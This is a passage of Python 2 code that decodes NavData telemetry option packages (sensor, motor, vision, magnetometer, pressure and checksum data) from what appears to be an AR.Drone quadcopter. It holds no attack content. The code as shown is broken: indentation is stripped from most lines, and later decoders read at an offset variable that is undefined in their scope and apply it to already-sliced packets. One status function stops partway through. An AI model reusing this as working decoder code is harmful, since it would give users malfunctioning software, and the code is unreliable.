# Value: 11 most significant bits represent the seconds, and the 21 least significant bits represent the microseconds.
	for i in range(0,21,1):		time[0] += ((dataset[2]>>i&1)*(2**i)) 	# Calculating the microsecond part (lower 21 bits)
	time[0] /= 1000000
	for i in range(21,32,1):	time[0] += (dataset[2]>>i&1)*(2**(i-21))	# Calculating the second part (upper 11 bits)
return(time)
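# Worked example (illustrative; the helper name and sample value are assumptions):
# for a raw time word t, the upper 11 bits are whole seconds and the lower 21 bits
# are microseconds, so t = (12 << 21) | 345678 decodes to 12.345678 seconds.
# The shift/mask version of the loops above:
def _example_decode_time(t=(12 << 21) | 345678):
	seconds      = t >> 21			# upper 11 bits
	microseconds = t & 0x1FFFFF		# lower 21 bits
	return seconds + microseconds/1000000.0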
##### ID = 2 ### "raw_measures" ################################################
def decode_ID2(packet): #NAVDATA_RAW_MEASURES_TAG
dataset = struct.unpack_from("HHHHHhhhhhIHHHHHHHHHHHHhh", packet, 0)
if dataset[1] != 52: print "*** ERROR : navdata-raw_measures-Options-Package (ID=2) has the wrong size !!!"
raw_measures = [[0,0,0],[0,0,0],[0,0],0,0,0,0,0,0,0,0,0,0,0,0,0]
	for i in range(0,3,1):	raw_measures[0][i] = dataset[2+i]	# raw_accs[xyz]		filtered accelerometer data	[LSB]	(uint16)
	for i in range(0,3,1):	raw_measures[1][i] = dataset[5+i]	# raw_gyros[xyz]	filtered gyrometer data		[LSB]	(int16)
for i in range(0,2,1): raw_measures[2][i] = dataset[8+i] # raw_gyros_110[xy] gyrometers x/y 110 deg/s [LSB] (int16)
raw_measures[ 3] = dataset[10] # vbat_raw battery voltage raw (mV) (uint)
raw_measures[ 4] = dataset[11] # us_debut_echo [LSB] (uint16)
raw_measures[ 5] = dataset[12] # us_fin_echo [LSB] (uint16)
raw_measures[ 6] = dataset[13] # us_association_echo [LSB] (uint16)
raw_measures[ 7] = dataset[14] # us_distance_echo [LSB] (uint16)
raw_measures[ 8] = dataset[15] # us_courbe_temps [LSB] (uint16)
raw_measures[ 9] = dataset[16] # us_courbe_valeur [LSB] (uint16)
raw_measures[10] = dataset[17] # us_courbe_ref [LSB] (uint16)
raw_measures[11] = dataset[18] # flag_echo_ini [LSB] (uint16)
raw_measures[12] = dataset[19] # nb_echo [LSB] (uint16)
	raw_measures[13] = dataset[21]			# sum_echo	just lower 16Bit, upper 16Bit=tags?	(uint32)
	raw_measures[14] = dataset[23]			# alt_temp_raw	in millimetres (just lower 16Bit)	(int32)
raw_measures[15] = dataset[24] # gradient [LSB] (int16)
return(raw_measures)
##### ID = 3 ### "phys_measures" ##############################################
def decode_ID3(packet): #NAVDATA_PHYS_MEASURES_TAG
dataset = struct.unpack_from("HHfHffffffIII", packet, 0)
if dataset[1] != 46: print "*** ERROR : navdata-phys_measures-Options-Package (ID=3) has the wrong size !!!"
phys_measures = [0,0,[0,0,0],[0,0,0],0,0,0]
phys_measures[0] = dataset[2] #float32 accs_temp
phys_measures[1] = dataset[3] #uint16 gyro_temp
phys_measures[4] = dataset[10] #uint32 alim3V3 3.3volt alim [LSB]
phys_measures[5] = dataset[11] #uint32 vrefEpson ref volt Epson gyro [LSB]
phys_measures[6] = dataset[12] #uint32 vrefIDG ref volt IDG gyro [LSB]
dataset = struct.unpack_from(">HHfHffffffIII", packet, 0) #switch from little to big-endian
for i in range(0,3,1): phys_measures[2][i] = dataset[4+i] #float32 phys_accs[xyz]
for i in range(0,3,1): phys_measures[3][i] = dataset[7+i] #float32 phys_gyros[xyz]
return(phys_measures)
##### ID = 4 ### "gyros_offsets" ##############################################
def decode_ID4(packet): 									#NAVDATA_GYROS_OFFSETS_TAG
dataset = struct.unpack_from("HHfff", packet, 0)
if dataset[1] != 16: print "*** ERROR : navdata-gyros_offsets-Options-Package (ID=4) has the wrong size !!!"
gyros_offsets = [0,0,0]
for i in range (0,3,1): gyros_offsets[i]=dataset[i+2] # offset_g[xyz] in deg/s (float)
return(gyros_offsets)
##### ID = 5 ### "euler_angles" ###############################################
def decode_ID5(packet): #NAVDATA_EULER_ANGLES_TAG
dataset = struct.unpack_from("HHff", packet, 0)
if dataset[1] != 12: print "*** ERROR : navdata-euler_angles-Options-Package (ID=5) has the wrong size !!!"
euler_angles = [0,0]
euler_angles[0] = dataset[2] #float32 theta_a (head/back)
euler_angles[1] = dataset[3] #float32 phi_a (sides)
return(euler_angles)
##### ID = 6 ### "references" #################################################
def decode_ID6(packet): #NAVDATA_REFERENCES_TAG
dataset = struct.unpack_from("HHiiiiiiiiffffffIfffffI", packet, 0)
if dataset[1] != 88: print "*** ERROR : navdata-references-Options-Package (ID=6) has the wrong size !!!"
references = [[0,0,0],[0,0],[0,0,0],[0.0,0.0],[0.0,0.0],[0.0,0.0],0,[0.0,0.0,0.0,0.0,0.0,0]]
references[0][0] = dataset[2] #ref_theta Theta_ref_embedded [milli-deg] (int32)
references[0][1] = dataset[3] #ref_phi Phi_ref_embedded [milli-deg] (int32)
references[0][2] = dataset[9] #ref_psi Psi_ref_embedded [milli-deg] (int32)
references[1][0] = dataset[4] #ref_theta_I Theta_ref_int [milli-deg] (int32)
references[1][1] = dataset[5] #ref_phi_I Phi_ref_int [milli-deg] (int32)
references[2][0] = dataset[6] #ref_pitch Pitch_ref_embedded [milli-deg] (int32)
references[2][1] = dataset[7] #ref_roll Roll_ref_embedded [milli-deg] (int32)
references[2][2] = dataset[8] #ref_yaw Yaw_ref_embedded [milli-deg/s] (int32)
references[3][0] = dataset[10] #vx_ref Vx_Ref_[mm/s] (float)
references[3][1] = dataset[11] #vy_ref Vy_Ref_[mm/s] (float)
references[4][0] = dataset[12] #theta_mod Theta_modele [radian] (float)
references[4][1] = dataset[13] #phi_mod Phi_modele [radian] (float)
references[5][0] = dataset[14] #k_v_x (float)
references[5][1] = dataset[15] #k_v_y (float)
references[6] = dataset[16] #k_mode (uint32)
references[7][0] = dataset[17] #ui_time (float)
references[7][1] = dataset[18] #ui_theta (float)
references[7][2] = dataset[19] #ui_phi (float)
references[7][3] = dataset[20] #ui_psi (float)
references[7][4] = dataset[21] #ui_psi_accuracy (float)
references[7][5] = dataset[22] #ui_seq (int32)
return(references)
##### ID = 7 ### "trims" ######################################################
def decode_ID7(packet): #NAVDATA_TRIMS_TAG
dataset = struct.unpack_from("HHfff", packet, 0)
if dataset[1] != 16: print "*** ERROR : navdata-trims-Options-Package (ID=7) has the wrong size !!!"
trims = [0,0,0]
trims[0] = dataset[2] # angular_rates_trim (float)
trims[1] = dataset[3] # euler_angles_trim_theta [milli-deg] (float)
trims[2] = dataset[4] # euler_angles_trim_phi [milli-deg] (float)
return(trims)
##### ID = 8 ### "rc_references" ##############################################
def decode_ID8(packet): #NAVDATA_RC_REFERENCES_TAG
dataset = struct.unpack_from("HHiiiii", packet, 0)
if dataset[1] != 24: print "*** ERROR : navdata-rc_references-Options-Package (ID=8) has the wrong size !!!"
rc_references = [0,0,0,0,0]
rc_references[0] = dataset[2] # rc_ref_pitch Pitch_rc_embedded (int32)
rc_references[1] = dataset[3] # rc_ref_roll Roll_rc_embedded (int32)
rc_references[2] = dataset[4] # rc_ref_yaw Yaw_rc_embedded (int32)
rc_references[3] = dataset[5] # rc_ref_gaz Gaz_rc_embedded (int32)
rc_references[4] = dataset[6] # rc_ref_ag Ag_rc_embedded (int32)
return(rc_references)
##### ID = 9 ### "pwm" ########################################################
def decode_ID9(packet): #NAVDATA_PWM_TAG
dataset = struct.unpack_from("HHBBBBBBBBffffiiifiiifHHHHff", packet, 0)
if dataset[1] != 76 and dataset[1] != 92: #92 since firmware 2.4.8 ?
print "*** ERROR : navdata-navdata_pwm-Options-Package (ID=9) has the wrong size !!!"
#print "Soll: 76 Ist:",dataset[1]
pwm = [[0,0,0,0],[0,0,0,0],0.0,0.0,0.0,0.0,[0,0,0],0.0,[0,0,0,0.0],[0,0,0,0],0.0,0.0]
for i in range(0,4,1): pwm[0][i] = dataset[2+i] # motor1/2/3/4 [Pulse-width mod] (uint8)
for i in range(0,4,1): pwm[1][i] = dataset[6+i] # sat_motor1/2/3/4 [Pulse-width mod] (uint8)
pwm[2] = dataset[10] # gaz_feed_forward [Pulse-width mod] (float)
pwm[3] = dataset[11] # gaz_altitud [Pulse-width mod] (float)
pwm[4] = dataset[12] # altitude_integral [mm/s] (float)
pwm[5] = dataset[13] # vz_ref [mm/s] (float)
pwm[6][0] = dataset[14] # u_pitch [Pulse-width mod] (int32)
pwm[6][1] = dataset[15] # u_roll [Pulse-width mod] (int32)
pwm[6][2] = dataset[16] # u_yaw [Pulse-width mod] (int32)
pwm[7] = dataset[17] # yaw_u_I [Pulse-width mod] (float)
pwm[8][0] = dataset[18] # u_pitch_planif [Pulse-width mod] (int32)
pwm[8][1] = dataset[19] # u_roll_planif [Pulse-width mod] (int32)
pwm[8][2] = dataset[20] # u_yaw_planif [Pulse-width mod] (int32)
pwm[8][3] = dataset[21] # u_gaz_planif [Pulse-width mod] (float)
for i in range(0,4,1):
pwm[9][i] = dataset[22+i] # current_motor1/2/3/4 [mA] (uint16)
pwm[10] = dataset[26] # altitude_prop [Pulse-width mod] (float)
pwm[11] = dataset[27] # altitude_der [Pulse-width mod] (float)
return(pwm)
##### ID = 10 ### "altitude" ###################################################
def decode_ID10(packet): #NAVDATA_ALTITUDE_TAG
dataset = struct.unpack_from("HHifiiffiiiIffI", packet, 0)
if dataset[1] != 56: print "*** ERROR : navdata-navdata_altitude-Options-Package (ID=10) has the wrong size !!!"
altitude = [0,0.0,0,0,0.0,0.0,[0,0,0],0,[0,0],0]
altitude[0] = dataset[2] # altitude_vision [mm] (int32)
altitude[1] = dataset[3] # altitude_vz [mm/s] (float)
altitude[2] = dataset[4] # altitude_ref [mm] (int32)
altitude[3] = dataset[5] # altitude_raw [mm] (int32)
altitude[4] = dataset[6] # obs_accZ Observer AccZ [m/s2] (float)
altitude[5] = dataset[7] # obs_alt Observer altitude US [m](float)
for i in range (0,3,1):
altitude[6][i] = dataset[8+i] # obs_x 3-Vector (int32)
altitude[7] = dataset[11] # obs_state Observer state [-] (uint32)
for i in range (0,2,1):
altitude[8][i] = dataset[12+i] # est_vb 2-Vector (float)
altitude[9] = dataset[14] # est_state Observer flight state (uint32)
return(altitude)
##### ID = 11 ### "vision_raw" #################################################
def decode_ID11(packet): #NAVDATA_VISION_RAW_TAG
dataset = struct.unpack_from("HHfff", packet, 0)
if dataset[1] != 16: print "*** ERROR : navdata-vision_raw-Options-Package (ID=11) has the wrong size !!!"
vision_raw = [0,0,0]
for i in range (0,3,1): vision_raw[i] = dataset[2+i] # vision_tx_raw (xyz) (float)
return(vision_raw)
##### ID = 12 ### "vision_of" #################################################
def decode_ID12(packet): #NAVDATA_VISION_OF_TAG
dataset = struct.unpack_from("HHffffffffff", packet, 0)
if dataset[1] != 44: print "*** ERROR : navdata-vision_of-Options-Package (ID=12) has the wrong size !!!"
vision_of = [[0.0,0.0,0.0,0.0,0.0],[0.0,0.0,0.0,0.0,0.0]]
for i in range (0,5,1): vision_of[0][i] = dataset[2+i] # of_dx[5] (float)
for i in range (0,5,1): vision_of[1][i] = dataset[7+i] # of_dy[5] (float)
return(vision_of)
##### ID = 13 ### "vision" #####################################################
def decode_ID13(packet): #NAVDATA_VISION_TAG
dataset = struct.unpack_from("HHIiffffifffiIffffffIIff", packet, 0)
if dataset[1] != 92: print "*** ERROR : navdata-vision-Options-Package (ID=13) has the wrong size !!!"
vision=[0,0,0.0,0.0,0.0,0.0,0,[0.0,0.0,0.0],0,0.0,[0.0,0.0,0.0],[0.0,0.0,0.0],0,0,[0.0,0.0]]
vision[0] = dataset[2] # vision_state FIXME: What are the meanings of the tags ?
vision[1] = dataset[3] # vision_misc (int32)
vision[2] = dataset[4] # vision_phi_trim (float)
vision[3] = dataset[5] # vision_phi_ref_prop (float)
vision[4] = dataset[6] # vision_theta_trim (float)
vision[5] = dataset[7] # vision_theta_ref_prop (float)
vision[6] = dataset[8] # new_raw_picture (int32)
for i in range (0,3,1):
vision[7][i] = dataset[9+i] # theta/phi/psi_capture (float)
vision[8] = dataset[12] # altitude_capture (int32)
	for i in range (0,21,1):					# Calculating the microsecond part (lower 21 bits)
vision[9] += ((dataset[13]>>i&1)*(2**i))
vision[9] /= 1000000
for i in range (21,32,1): # Calculating second-part
vision[9] += (dataset[13]>>i&1)*(2**(i-21)) # time_capture (float)
for i in range (0,3,1):
vision[10][i] = dataset[14+i] # velocities[xyz] (float)
for i in range (0,3,1):
vision[11][i] = dataset[17+i] # delta_phi/theta/psi (float)
vision[12] = dataset[20] # gold_defined (uint32)
vision[13] = dataset[21] # gold_reset (uint32)
vision[14][0] = dataset[22] # gold_x (float)
vision[14][1] = dataset[23] # gold_y (float)
return(vision)
##### ID = 14 ### "vision_perf" ###############################################
def decode_ID14(packet): #NAVDATA_VISION_PERF_TAG
dataset = struct.unpack_from("HHffffffffffffffffffffffffff", packet, 0)
	if dataset[1] != 108:	print "*** ERROR : navdata-vision_perf-Options-Package (ID=14) has the wrong size !!!"
vision_perf=[0.0,0.0,0.0,0.0,0.0,0.0,[0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]]
vision_perf[0] = dataset[2] # time_szo (float)
vision_perf[1] = dataset[3] # time_corners (float)
vision_perf[2] = dataset[4] # time_compute (float)
vision_perf[3] = dataset[5] # time_tracking (float)
vision_perf[4] = dataset[6] # time_trans (float)
vision_perf[5] = dataset[7] # time_update (float)
for i in range (0,20,1):
vision_perf[6][i] = dataset[8+i] # time_custom[20] (float)
return(vision_perf)
##### ID = 15 ### "trackers_send" #############################################
def decode_ID15(packet): #NAVDATA_TRACKERS_SEND_TAG
dataset = struct.unpack_from("HHiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii", packet, 0)
if dataset[1] != 364: print "*** ERROR : navdata-trackers_send-Options-Package (ID=15) has the wrong size !!!"
DEFAULT_NB_TRACKERS_WIDTH = 6
DEFAULT_NB_TRACKERS_HEIGHT = 5
limit = DEFAULT_NB_TRACKERS_WIDTH*DEFAULT_NB_TRACKERS_HEIGHT
trackers_send = [[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0],[0,0]]]
for i in range (0, limit, 1):
trackers_send[0][i] = dataset[2+i] # locked[limit] (int32)
for i in range (0, limit, 1):
trackers_send[1][i][0] = dataset[32+(i*2)] # point[x[limit],y[limit]] (int32)
trackers_send[1][i][1] = dataset[33+(i*2)]
return(trackers_send)
##### ID = 16 ### "vision_detect" #############################################
def decode_ID16(packet): #NAVDATA_VISION_DETECT_TAG
dataset = struct.unpack_from("HHIIIIIIIIIIIIIIIIIIIIIIIIIffffIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII", packet, offsetND)
if dataset[1] != 328: print "*** ERROR : navdata-vision_detect-Package (ID=16) has the wrong size !!!"
vision_detect = [0,[0,0,0,0],[0,0,0,0],[0,0,0,0],[0,0,0,0],[0,0,0,0],[0,0,0,0],[0.0,0.0,0.0,0.0],[[0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0],[0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0],[0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0],[0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]],[[0.0,0.0,0.0],[0.0,0.0,0.0],[0.0,0.0,0.0],[0.0,0.0,0.0]],[0,0,0,0]]
#Max marker detection in one picture: 4
vision_detect[0] = dataset[2] # nb_detected (uint32)
for i in range (0,4,1): vision_detect[1][i] = dataset[3+i] # type[4] (uint32)
for i in range (0,4,1): vision_detect[2][i] = dataset[7+i] # xc[4] (uint32)
for i in range (0,4,1): vision_detect[3][i] = dataset[11+i] # yc[4] (uint32)
for i in range (0,4,1): vision_detect[4][i] = dataset[15+i] # width[4] (uint32)
for i in range (0,4,1): vision_detect[5][i] = dataset[19+i] # height[4] (uint32)
for i in range (0,4,1): vision_detect[6][i] = dataset[23+i] # dist[4] (uint32)
for i in range (0,4,1): vision_detect[7][i] = dataset[27+i] # orientation_angle[4] (float)
for i in range (0,4,1):
		for j in range (0,9,1):	vision_detect[8][i][j] = dataset[31+i*9+j]		# rotation[4]			(float 3x3 matrix (11,12,13,21,...))
for i in range (0,4,1):
		for j in range (0,3,1):	vision_detect[9][i][j] = dataset[67+i*3+j]		# translation[4]		(float 3 vector)
for i in range (0,4,1): vision_detect[10][i] = dataset[79+i] # camera_source[4] (uint32)
return(vision_detect)
##### ID = 17 ### "watchdog" ###################################################
def decode_ID17(packet): #NAVDATA_WATCHDOG_TAG
dataset = struct.unpack_from("HHI", packet, offsetND)
if dataset[1] != 8: print "*** ERROR : navdata-watchdog-Package (ID=17) has the wrong size !!!"
watchdog = dataset[2] # watchdog Watchdog controll [-] (uint32)
return(watchdog)
##### ID = 18 ### "adc_data_frame" #############################################
def decode_ID18(packet): #NAVDATA_ADC_DATA_FRAME_TAG
dataset = struct.unpack_from("HHIBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB", packet, offsetND)
if dataset[1] != 40: print "*** ERROR : navdata-adc_data_frame-Package (ID=18) has the wrong size !!!"
adc_data_frame = [0,[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]]
adc_data_frame[0] = dataset[2] # version (uint32)
for i in range (0,32,1): adc_data_frame[1][i] = dataset[3+i] # data_frame[32] (uint8)
return(adc_data_frame)
##### ID = 19 ### "video_stream" ###############################################
def decode_ID19(packet): #NAVDATA_VIDEO_STREAM_TAG
dataset = struct.unpack_from("HHBIIIIfIIIiiiiiII", packet, offsetND)
if dataset[1] != 65: print "*** ERROR : navdata-video_stream-Package (ID=19) has the wrong size !!!"
video_stream = [0,0,0,0,0,0.0,0,0,0,[0,0,0,0,0],0,0]
video_stream[0] = dataset[2] # quant quantizer reference used to encode [1:31] (uint8)
video_stream[1] = dataset[3] # frame_size frame size in bytes (uint32)
video_stream[2] = dataset[4] # frame_number frame index (uint32)
video_stream[3] = dataset[5] # atcmd_ref_seq atmcd ref sequence number (uint32)
video_stream[4] = dataset[6] # atcmd_mean_ref_gap mean time between two consecutive atcmd_ref (ms) (uint32)
video_stream[5] = dataset[7] # atcmd_var_ref_gap (float)
video_stream[6] = dataset[8] # atcmd_ref_quality estimator of atcmd link quality (uint32)
#Drone 2.0:
video_stream[7] = dataset[9] # out_bitrate measured out throughput from the video tcp socket (uint32)
video_stream[8] = dataset[10] # desired_bitrate last frame size generated by the video encoder (uint32)
for i in range (0,5,1): video_stream[9][i] = dataset[11+i] # data misc temporary data (int32)
video_stream[10] = dataset[16] # tcp_queue_level queue usage (uint32)
video_stream[11] = dataset[17] # fifo_queue_level queue usage (uint32)
return(video_stream)
##### ID = 20 ### "games" ######################################################
def decode_ID20(packet): #NAVDATA_GAMES_TAG
dataset = struct.unpack_from("HHII", packet, offsetND)
if dataset[1] != 12: print "*** ERROR : navdata-games-Package (ID=20) has the wrong size !!!"
games = [0,0]
games[0] = dataset[2] # double_tap_counter (uint32)
games[1] = dataset[3] # finish_line_counter (uint32)
return(games)
##### ID = 21 ### "pressure_raw" ###############################################
def decode_ID21(packet): #NAVDATA_PRESSURE_RAW_TAG
dataset = struct.unpack_from("HHihii", packet, offsetND)
if dataset[1] != 18: print "*** ERROR : navdata-pressure_raw-Package (ID=21) has the wrong size !!!"
pressure_raw = [0,0,0,0]
pressure_raw[0] = dataset[2] # up (int32)
pressure_raw[1] = dataset[3] # ut (int16)
pressure_raw[2] = dataset[4] # Temperature_meas (int32)
pressure_raw[3] = dataset[5] # Pression_meas (int32)
return(pressure_raw)
##### ID = 22 ### "magneto" ####################################################
def decode_ID22(packet): #NAVDATA_MAGNETO_TAG
dataset = struct.unpack_from("HHhhhffffffffffffBifff", packet, offsetND)
if dataset[1] != 83: print "*** ERROR : navdata-magneto-Package (ID=22) has the wrong size !!!"
magneto = [[0,0,0],[0.0,0.0,0.0],[0.0,0.0,0.0],[0.0,0.0,0.0],0.0,0.0,0.0,0,0,0.0,0.0,0.0]
for i in range (0,3,1): magneto[0][i]=dataset[2+i] # mx/my/mz (int16)
for i in range (0,3,1): magneto[1][i]=dataset[5+i] # magneto_raw magneto in the body frame [mG] (vector float)
for i in range (0,3,1): magneto[2][i]=dataset[8+i] # magneto_rectified (vector float)
for i in range (0,3,1): magneto[3][i]=dataset[11+i] # magneto_offset (vector float)
magneto[ 4] = dataset[14] # heading_unwrapped (float)
magneto[ 5] = dataset[15] # heading_gyro_unwrapped (float)
magneto[ 6] = dataset[16] # heading_fusion_unwrapped (float)
magneto[ 7] = dataset[17] # magneto_calibration_ok (char)
magneto[ 8] = dataset[18] # magneto_state (uint32)
magneto[ 9] = dataset[19] # magneto_radius (float)
magneto[10] = dataset[20] # error_mean (float)
magneto[11] = dataset[21] # error_var (float)
return(magneto)
##### ID = 23 ### "wind_speed" ################################################
def decode_ID23(packet): #NAVDATA_WIND_TAG
dataset = struct.unpack_from("HHfffffffffffff", packet, offsetND)
if dataset[1] != 56 and dataset[1] != 64:
print "*** ERROR : navdata-wind_speed-Package (ID=23) has the wrong size !!!"
wind_speed = [0.0,0.0,[0.0,0.0],[0.0,0.0,0.0,0.0,0.0,0.0],[0.0,0.0,0.0]]
wind_speed[0] = dataset[2] # wind_speed (float)
wind_speed[1] = dataset[3] # wind_angle (float)
wind_speed[2][0] = dataset[4] # wind_compensation_theta (float)
wind_speed[2][1] = dataset[5] # wind_compensation_phi (float)
for i in range (0,6,1): wind_speed[3][i]=dataset[6+i] # state_x[1-6] (float)
	for i in range (0,3,1):	wind_speed[4][i]=dataset[12+i]		# magneto_debug[1-3]				(float)
return(wind_speed)
##### ID = 24 ### "kalman_pressure" ###########################################
def decode_ID24(packet): #NAVDATA_KALMAN_PRESSURE_TAG
dataset = struct.unpack_from("HHffffffffff?f?ff??", packet, offsetND)
	if dataset[1] != 72:	print "*** ERROR : navdata-kalman_pressure-Package (ID=24) has the wrong size !!!"
kalman_pressure = [0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0,0.0,False,0.0,0.0,False,False]
kalman_pressure[ 0] = dataset[2] # offset_pressure (float)
kalman_pressure[ 1] = dataset[3] # est_z (float)
kalman_pressure[ 2] = dataset[4] # est_zdot (float)
kalman_pressure[ 3] = dataset[5] # est_bias_PWM (float)
kalman_pressure[ 4] = dataset[6] # est_biais_pression (float)
kalman_pressure[ 5] = dataset[7] # offset_US (float)
kalman_pressure[ 6] = dataset[8] # prediction_US (float)
kalman_pressure[ 7] = dataset[9] # cov_alt (float)
kalman_pressure[ 8] = dataset[10] # cov_PWM (float)
kalman_pressure[ 9] = dataset[11] # cov_vitesse (float)
kalman_pressure[10] = dataset[12] # bool_effet_sol (bool)
kalman_pressure[11] = dataset[13] # somme_inno (float)
kalman_pressure[12] = dataset[14] # flag_rejet_US (bool)
kalman_pressure[13] = dataset[15] # u_multisinus (float)
kalman_pressure[14] = dataset[16] # gaz_altitude (float)
kalman_pressure[15] = dataset[17] # Flag_multisinus (bool)
kalman_pressure[16] = dataset[18] # Flag_multisinus_debut (bool)
return(kalman_pressure)
##### ID = 25 ### "hdvideo_stream" ############################################
def decode_ID25(packet): #NAVDATA_HDVIDEO-TAG
dataset = struct.unpack_from("HHfffffff", packet, offsetND)
if dataset[1] != 32: print "*** ERROR : navdata-hdvideo_stream-Package (ID=25) has the wrong size !!!"
hdvideo_stream = [0.0,0.0,0.0,0.0,0.0,0.0,0.0]
hdvideo_stream[0] = dataset[2] # hdvideo_state (float)
hdvideo_stream[1] = dataset[3] # storage_fifo_nb_packets (float)
hdvideo_stream[2] = dataset[4] # storage_fifo_size (float)
hdvideo_stream[3] = dataset[5] # usbkey_size USB key in kb (no key=0)(float)
hdvideo_stream[4] = dataset[6] # usbkey_freespace USB key in kb (no key=0)(float)
hdvideo_stream[5] = dataset[7] # frame_number PaVE field of the frame starting to be encoded for the HD stream (float)
hdvideo_stream[6] = dataset[8] # usbkey_remaining_time [sec] (float)
return(hdvideo_stream)
##### ID = 26 ### "wifi" ######################################################
def decode_ID26(packet): #NAVDATA_WIFI_TAG
dataset = struct.unpack_from("HHI", packet, offsetND)
if dataset[1] != 8: print "*** ERROR : navdata-wifi-Package (ID=26) has the wrong size !!!"
wifi = dataset[2] # link_quality (uint32)
return(wifi)
##### ID = 27 ### "zimmu_3000" ################################################
def decode_ID27(packet): #NAVDATA_ZIMU_3000_TAG
dataset = struct.unpack_from("HHif", packet, offsetND)
if dataset[1] != 12 and dataset[1] != 216: # 216 since firmware 2.4.8 ?
print "*** ERROR : navdata-zimmu_3000-Package (ID=27) has the wrong size !!!"
zimmu_3000 = [0,0.0]
zimmu_3000[0] = dataset[2] # vzimmuLSB (int32)
zimmu_3000[1] = dataset[3] # vzfind (float)
return(zimmu_3000)
##### Footer ### "chksum" #####################################################
def decode_Footer(packet,allpacket): ### Decode Checksum options-package ID=65535
dataset = struct.unpack_from("HHI", packet, offsetND)
if dataset[1] != 8: print "*** ERROR : Checksum-Options-Package (ID=65535) has the wrong size !!!"
chksum = [0,False]
chksum[0] = dataset[2]
sum, plen = 0, len(allpacket)-8
	for i in range (0,plen,1):	sum += ord(allpacket[i])	# Slows down this Navdata-subprocess massively
if sum == chksum[0]: chksum[1] = True
return(chksum)
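# Minimal sketch (the helper name is hypothetical, not part of the original code): the
# drone's checksum is the plain byte-sum of the whole NavData packet except its last
# 8 bytes (the checksum option package itself), which is exactly what decode_Footer()
# recomputes above before comparing it against the transmitted value.
def _example_checksum(allpacket):
	checksum = 0
	for byte in allpacket[:-8]:		# skip the trailing checksum option package
		checksum += ord(byte)		# Python-2 strings: ord() yields the byte value
	return checksum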
###############################################################################
### Navdata-Decoding
###############################################################################
def getDroneStatus(packet):
arState = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
checksum = (0,False)
length = len(packet)
dataset = struct.unpack_from("IIII", packet, 0) # Reading (Header, State, Sequence, Vision)
offsetND = struct.calcsize("IIII")
###############################=-
### Decode Options-Packages ###=-
###############################=-
def getNavdata(packet,choice):
navdata = {}
length = len(packet)
dataset = struct.unpack_from("IIII", packet, 0) # Reading (Header, State, Sequence, Vision)
navdata["state"] = decode_Header(dataset)
offsetND = struct.calcsize("IIII")
#Demo-mode contains normally Option-Packages with ID=0 (_navdata_demo_t), ID=16 (seems empty) and ID=65535 (checksum)
# Full Mode contains
while offsetND < length:
dataset = struct.unpack_from("HH", packet, offsetND) # Reading (Header, Length)
if dataset[0]== 0 and choice[ 0]: navdata["demo"] = decode_ID0(packet[offsetND:])
if dataset[0]== 1 and choice[ 1]: navdata["time"] = decode_ID1(packet[offsetND:])
if dataset[0]== 2 and choice[ 2]: navdata["raw_measures"] = decode_ID2(packet[offsetND:])
if dataset[0]== 3 and choice[ 3]: navdata["phys_measures"] = decode_ID3(packet[offsetND:])
if dataset[0]== 4 and choice[ 4]: navdata["gyros_offsets"] = decode_ID4(packet[offsetND:])
if dataset[0]== 5 and choice[ 5]: navdata["euler_angles"] = decode_ID5(packet[offsetND:])
if dataset[0]== 6 and choice[ 6]: navdata["references"] = decode_ID6(packet[offsetND:])
if dataset[0]== 7 and choice[ 7]: navdata["trims"] = decode_ID7(packet[offsetND:])
if dataset[0]== 8 and choice[ 8]: navdata["rc_references"] = decode_ID8(packet[offsetND:])
if dataset[0]== 9 and choice[ 9]: navdata["pwm"] = decode_ID9(packet[offsetND:])
if dataset[0]==10 and choice[10]: navdata["altitude"] = decode_ID10(packet[offsetND:])
if dataset[0]==11 and choice[11]: navdata["vision_raw"] = decode_ID11(packet[offsetND:])
if dataset[0]==12 and choice[12]: navdata["vision_of"] = decode_ID12(packet[offsetND:])
if dataset[0]==13 and choice[13]: navdata["vision"] = decode_ID13(packet[offsetND:])
if dataset[0]==14 and choice[14]: navdata["vision_perf"] = decode_ID14(packet[offsetND:])
if dataset[0]==15 and choice[15]: navdata["trackers_send"] = decode_ID15(packet[offsetND:])
if dataset[0]==16 and choice[16]: navdata["vision_detect"] = decode_ID16(packet[offsetND:])
if dataset[0]==17 and choice[17]: navdata["watchdog"] = decode_ID17(packet[offsetND:])
if dataset[0]==18 and choice[18]: navdata["adc_data_frame"] = decode_ID18(packet[offsetND:])
if dataset[0]==19 and choice[19]: navdata["video_stream"] = decode_ID19(packet[offsetND:])
if dataset[0]==20 and choice[20]: navdata["games"] = decode_ID20(packet[offsetND:])
if dataset[0]==21 and choice[21]: navdata["pressure_raw"] = decode_ID21(packet[offsetND:])
if dataset[0]==22 and choice[22]: navdata["magneto"] = decode_ID22(packet[offsetND:])
if dataset[0]==23 and choice[23]: navdata["wind_speed"] = decode_ID23(packet[offsetND:])
if dataset[0]==24 and choice[24]: navdata["kalman_pressure"] = decode_ID24(packet[offsetND:])
if dataset[0]==25 and choice[25]: navdata["hdvideo_stream"] = decode_ID25(packet[offsetND:])
if dataset[0]==26 and choice[26]: navdata["wifi"] = decode_ID26(packet[offsetND:])
if dataset[0]==27 and choice[27]: navdata["zimmu_3000"] = decode_ID27(packet[offsetND:])
